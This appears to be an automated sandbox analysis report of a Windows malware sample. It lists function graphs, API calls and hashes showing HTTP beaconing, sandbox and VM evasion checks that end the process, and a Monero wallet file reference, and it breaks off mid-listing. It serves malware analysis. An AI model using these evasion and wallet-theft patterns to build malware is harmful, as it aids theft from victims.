                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 65220bac4d33096ef678a055947ac1a13f243c4bf2e18a8aa14b1662f0547179
                              • Instruction ID: 3102950c568a1bdaf4c2411e04653092e0f82e6db0ee48c2a881f3b829832472
                              • Opcode Fuzzy Hash: 65220bac4d33096ef678a055947ac1a13f243c4bf2e18a8aa14b1662f0547179
                              • Instruction Fuzzy Hash: BE62F9B5610240AFC344DFA9ED8EB6E37F9F78C601724851BA609C3274D6399842DFD6
                              Function 00A56280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 a56280-a5630b call a6a7a0 call a547b0 call a6a740 InternetOpenA StrCmpCA 1040 a56314-a56318 1033->1040 1041 a5630d 1033->1041 1042 a5631e-a56342 InternetConnectA 1040->1042 1043 a56509-a56525 call a6a7a0 call a6a800 * 2 1040->1043 1041->1040 1045 a564ff-a56503 InternetCloseHandle 1042->1045 1046 a56348-a5634c 1042->1046 1062 a56528-a5652d 1043->1062 1045->1043 1047 a5634e-a56358 1046->1047 1048 a5635a 1046->1048 1050 a56364-a56392 HttpOpenRequestA 1047->1050 1048->1050 1052 a564f5-a564f9 InternetCloseHandle 1050->1052 1053 a56398-a5639c 1050->1053 1052->1045 1055 a563c5-a56405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 a5639e-a563bf InternetSetOptionA 1053->1056 1058 a56407-a56427 call a6a740 call a6a800 * 2 1055->1058 1059 a5642c-a5644b call a68940 1055->1059 1056->1055 1058->1062 1066 a5644d-a56454 1059->1066 1067 a564c9-a564e9 call a6a740 call a6a800 * 2 1059->1067 1069 a564c7-a564ef InternetCloseHandle 1066->1069 1070 a56456-a56480 InternetReadFile 1066->1070 1067->1062 1069->1052 1073 a56482-a56489 1070->1073 1074 a5648b 1070->1074 1073->1074 1078 a5648d-a564c5 call a6a9b0 call a6a8a0 call a6a800 1073->1078 1074->1069 1078->1070
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A54839
                                • Part of subcall function 00A547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • InternetOpenA.WININET(00A70DFE,00000001,00000000,00000000,00000000), ref: 00A562E1
                              • StrCmpCA.SHLWAPI(?,0144F340), ref: 00A56303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A56335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A56385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A563BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A563D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00A563FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A5646D
                              • InternetCloseHandle.WININET(00000000), ref: 00A564EF
                              • InternetCloseHandle.WININET(00000000), ref: 00A564F9
                              • InternetCloseHandle.WININET(00000000), ref: 00A56503
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 79d22bdfa3e6003dce0a51679c0333e9fedd2a943e7ba6c7f982840fb37f6281
                              • Instruction ID: 0d53210923e9b8c041f5d2deccf18218c7922f7155cb52afe57a1fb54a4cd8d3
                              • Opcode Fuzzy Hash: 79d22bdfa3e6003dce0a51679c0333e9fedd2a943e7ba6c7f982840fb37f6281
                              • Instruction Fuzzy Hash: 18714D71A00218EBDB24DFA0CD49BEE7778FB54701F508199F50AAB1D0DBB46A89CF91
                              Function 00A65510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 a65510-a65577 call a65ad0 call a6a820 * 3 call a6a740 * 4 1106 a6557c-a65583 1090->1106 1107 a655d7-a6564c call a6a740 * 2 call a51590 call a652c0 call a6a8a0 call a6a800 call a6aad0 StrCmpCA 1106->1107 1108 a65585-a655b6 call a6a820 call a6a7a0 call a51590 call a651f0 1106->1108 1133 a65693-a656a9 call a6aad0 StrCmpCA 1107->1133 1137 a6564e-a6568e call a6a7a0 call a51590 call a651f0 call a6a8a0 call a6a800 1107->1137 1124 a655bb-a655d2 call a6a8a0 call a6a800 1108->1124 1124->1133 1140 a656af-a656b6 1133->1140 1141 a657dc-a65844 call a6a8a0 call a6a820 * 2 call a51670 call a6a800 * 4 call a66560 call a51550 1133->1141 1137->1133 1144 a656bc-a656c3 1140->1144 1145 a657da-a6585f call a6aad0 StrCmpCA 1140->1145 1272 a65ac3-a65ac6 1141->1272 1146 a656c5-a65719 call a6a820 call a6a7a0 call a51590 call a651f0 call a6a8a0 call a6a800 1144->1146 1147 a6571e-a65793 call a6a740 * 2 call a51590 call a652c0 call a6a8a0 call a6a800 call a6aad0 StrCmpCA 1144->1147 1165 a65865-a6586c 1145->1165 1166 a65991-a659f9 call a6a8a0 call a6a820 * 2 call a51670 call a6a800 * 4 call a66560 call a51550 1145->1166 1146->1145 1147->1145 1250 a65795-a657d5 call a6a7a0 call a51590 call a651f0 call a6a8a0 call a6a800 1147->1250 1167 a65872-a65879 1165->1167 1168 a6598f-a65a14 call a6aad0 StrCmpCA 1165->1168 1166->1272 1174 a658d3-a65948 call a6a740 * 2 call a51590 call a652c0 call a6a8a0 call a6a800 call a6aad0 StrCmpCA 1167->1174 1175 a6587b-a658ce call a6a820 call a6a7a0 call a51590 call a651f0 call a6a8a0 call a6a800 1167->1175 1197 a65a16-a65a21 Sleep 1168->1197 1198 a65a28-a65a91 call a6a8a0 call a6a820 * 2 call a51670 call a6a800 * 4 call a66560 call a51550 1168->1198 1174->1168 1276 a6594a-a6598a call a6a7a0 call a51590 call a651f0 call a6a8a0 call a6a800 1174->1276 1175->1168 1197->1106 1198->1272 1250->1145 1276->1168
                              APIs
                                • Part of subcall function 00A6A820: lstrlen.KERNEL32(00A54F05,?,?,00A54F05,00A70DDE), ref: 00A6A82B
                                • Part of subcall function 00A6A820: lstrcpy.KERNEL32(00A70DDE,00000000), ref: 00A6A885
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A65644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A656A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A65857
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A651F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A65228
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A652C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A65318
                                • Part of subcall function 00A652C0: lstrlen.KERNEL32(00000000), ref: 00A6532F
                                • Part of subcall function 00A652C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00A65364
                                • Part of subcall function 00A652C0: lstrlen.KERNEL32(00000000), ref: 00A65383
                                • Part of subcall function 00A652C0: lstrlen.KERNEL32(00000000), ref: 00A653AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A6578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A65940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A65A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00A65A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 4ea861fcb1e69f33e0cce12f63adacfd268b590a6710380bf199e6f5788fc425
                              • Instruction ID: a44be8ba271b76f8568bb47b94f7c0dbd64df19645e45f058d18d0540735e05f
                              • Opcode Fuzzy Hash: 4ea861fcb1e69f33e0cce12f63adacfd268b590a6710380bf199e6f5788fc425
                              • Instruction Fuzzy Hash: 22E1EC72A10504AACB14FBB0DE96EFD7378BF64340F508529B517A7191EF346A09CFA2
                              Function 00A617A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 a617a0-a617cd call a6aad0 StrCmpCA 1304 a617d7-a617f1 call a6aad0 1301->1304 1305 a617cf-a617d1 ExitProcess 1301->1305 1309 a617f4-a617f8 1304->1309 1310 a619c2-a619cd call a6a800 1309->1310 1311 a617fe-a61811 1309->1311 1313 a61817-a6181a 1311->1313 1314 a6199e-a619bd 1311->1314 1316 a61821-a61830 call a6a820 1313->1316 1317 a618cf-a618e0 StrCmpCA 1313->1317 1318 a6198f-a61999 call a6a820 1313->1318 1319 a618ad-a618be StrCmpCA 1313->1319 1320 a61849-a61858 call a6a820 1313->1320 1321 a61835-a61844 call a6a820 1313->1321 1322 a61932-a61943 StrCmpCA 1313->1322 1323 a61913-a61924 StrCmpCA 1313->1323 1324 a61970-a61981 StrCmpCA 1313->1324 1325 a618f1-a61902 StrCmpCA 1313->1325 1326 a61951-a61962 StrCmpCA 1313->1326 1327 a6187f-a61890 StrCmpCA 1313->1327 1328 a6185d-a6186e StrCmpCA 1313->1328 1314->1309 1316->1314 1348 a618e2-a618e5 1317->1348 1349 a618ec 1317->1349 1318->1314 1346 a618c0-a618c3 1319->1346 1347 a618ca 1319->1347 1320->1314 1321->1314 1331 a61945-a61948 1322->1331 1332 a6194f 1322->1332 1329 a61926-a61929 1323->1329 1330 a61930 1323->1330 1336 a61983-a61986 1324->1336 1337 a6198d 1324->1337 1350 a61904-a61907 1325->1350 1351 a6190e 1325->1351 1333 a61964-a61967 1326->1333 1334 a6196e 1326->1334 1344 a61892-a6189c 1327->1344 1345 a6189e-a618a1 1327->1345 1342 a61870-a61873 1328->1342 1343 a6187a 1328->1343 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1336->1337 1337->1314 1342->1343 1343->1314 1355 a618a8 1344->1355 1345->1355 1346->1347 1347->1314 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00A617C5
                              • ExitProcess.KERNEL32 ref: 00A617D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: ce57804cba61d210f1864496c530164789d0e9155daf295d63c29ed9620e889b
                              • Instruction ID: 1f01d9dd068dd9ac0967dbd391cb78d53ed4bc17a374cbaafab6a0ee67c98820
                              • Opcode Fuzzy Hash: ce57804cba61d210f1864496c530164789d0e9155daf295d63c29ed9620e889b
                              • Instruction Fuzzy Hash: 82518FB5A00209EFCB04DFA1D958FBE7BB5BF44704F188849E406A7281E770E951CFA6
                              Function 00A67500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 a67500-a6754a GetWindowsDirectoryA 1357 a67553-a675c7 GetVolumeInformationA call a68d00 * 3 1356->1357 1358 a6754c 1356->1358 1365 a675d8-a675df 1357->1365 1358->1357 1366 a675e1-a675fa call a68d00 1365->1366 1367 a675fc-a67617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 a67628-a67658 wsprintfA call a6a740 1367->1369 1370 a67619-a67626 call a6a740 1367->1370 1377 a6767e-a6768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A67542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A6757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A6760A
                              • wsprintfA.USER32 ref: 00A67640
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 8f211fbd03cc319a729f8d488c048df9a1b4ecbfc49267ebc3251a4c4df5bf55
                              • Instruction ID: cb0dc3c358c22a8b9710e8163ff3039849d94574ca9988f745e6cc4c50610256
                              • Opcode Fuzzy Hash: 8f211fbd03cc319a729f8d488c048df9a1b4ecbfc49267ebc3251a4c4df5bf55
                              • Instruction Fuzzy Hash: 174191B1D04248EBDB10DF94DD49BEEBBB8EF18704F100199F509A7280DB78AA44CFA5
                              Function 00A669F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,014416A8), ref: 00A698A1
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,014414F8), ref: 00A698BA
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441678), ref: 00A698D2
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,014416C0), ref: 00A698EA
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441570), ref: 00A69903
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01448B18), ref: 00A6991B
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01435448), ref: 00A69933
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,014356C8), ref: 00A6994C
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441558), ref: 00A69964
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441708), ref: 00A6997C
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441720), ref: 00A69995
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441528), ref: 00A699AD
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,014355A8), ref: 00A699C5
                                • Part of subcall function 00A69860: GetProcAddress.KERNEL32(77190000,01441750), ref: 00A699DE
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A511D0: ExitProcess.KERNEL32 ref: 00A51211
                                • Part of subcall function 00A51160: GetSystemInfo.KERNEL32(?), ref: 00A5116A
                                • Part of subcall function 00A51160: ExitProcess.KERNEL32 ref: 00A5117E
                                • Part of subcall function 00A51110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A5112B
                                • Part of subcall function 00A51110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00A51132
                                • Part of subcall function 00A51110: ExitProcess.KERNEL32 ref: 00A51143
                                • Part of subcall function 00A51220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A5123E
                                • Part of subcall function 00A51220: __aulldiv.LIBCMT ref: 00A51258
                                • Part of subcall function 00A51220: __aulldiv.LIBCMT ref: 00A51266
                                • Part of subcall function 00A51220: ExitProcess.KERNEL32 ref: 00A51294
                                • Part of subcall function 00A66770: GetUserDefaultLangID.KERNEL32 ref: 00A66774
                                • Part of subcall function 00A51190: ExitProcess.KERNEL32 ref: 00A511C6
                                • Part of subcall function 00A67850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A511B7), ref: 00A67880
                                • Part of subcall function 00A67850: RtlAllocateHeap.NTDLL(00000000), ref: 00A67887
                                • Part of subcall function 00A67850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A6789F
                                • Part of subcall function 00A678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67910
                                • Part of subcall function 00A678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A67917
                                • Part of subcall function 00A678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A6792F
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01448B38,?,00A7110C,?,00000000,?,00A71110,?,00000000,00A70AEF), ref: 00A66ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A66AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00A66AF9
                              • Sleep.KERNEL32(00001770), ref: 00A66B04
                              • CloseHandle.KERNEL32(?,00000000,?,01448B38,?,00A7110C,?,00000000,?,00A71110,?,00000000,00A70AEF), ref: 00A66B1A
                              • ExitProcess.KERNEL32 ref: 00A66B22
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: c4b52139045dac08c2db6293d55e1a212383db7a8d2eddb2dca8fe77ef5e7020
                              • Instruction ID: f0fa83e81c80498480ef9e2ef2316759b63514cc2aa784a2373b9e162895677b
                              • Opcode Fuzzy Hash: c4b52139045dac08c2db6293d55e1a212383db7a8d2eddb2dca8fe77ef5e7020
                              • Instruction Fuzzy Hash: 0431EB71A50208AADB04FBF0DE56BFE7778BF24341F504519F612B6191DF706905CBA2
                              Function 00A51220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 a51220-a51247 call a689b0 GlobalMemoryStatusEx 1439 a51273-a5127a 1436->1439 1440 a51249-a51271 call a6da00 * 2 1436->1440 1442 a51281-a51285 1439->1442 1440->1442 1444 a51287 1442->1444 1445 a5129a-a5129d 1442->1445 1447 a51292-a51294 ExitProcess 1444->1447 1448 a51289-a51290 1444->1448 1448->1445 1448->1447
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A5123E
                              • __aulldiv.LIBCMT ref: 00A51258
